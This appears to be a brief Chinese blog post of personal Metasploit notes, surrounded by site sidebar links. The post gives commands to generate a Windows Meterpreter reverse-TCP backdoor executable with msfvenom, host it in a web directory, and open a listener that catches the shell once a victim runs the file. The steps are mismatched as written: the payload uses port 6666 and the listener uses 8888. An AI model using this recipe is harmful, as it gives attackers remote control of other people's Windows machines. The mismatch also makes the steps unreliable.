msf记录

生成backdoor

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.187.133 LPORT=6666 -f exe >/var/www/html/chrome/1.exe

 

设置监听参数

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.187.133

set LPORT 8888

exploit

在windows机器上运行1.exe 上线 !

自动进入meterpreter

然后shell  进入CMD界面

 https://blog.csdn.net/qq_42094992/article/details/109004560

posted @   华中第一黑  阅读(74)  评论(0编辑  收藏  举报
编辑推荐:
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示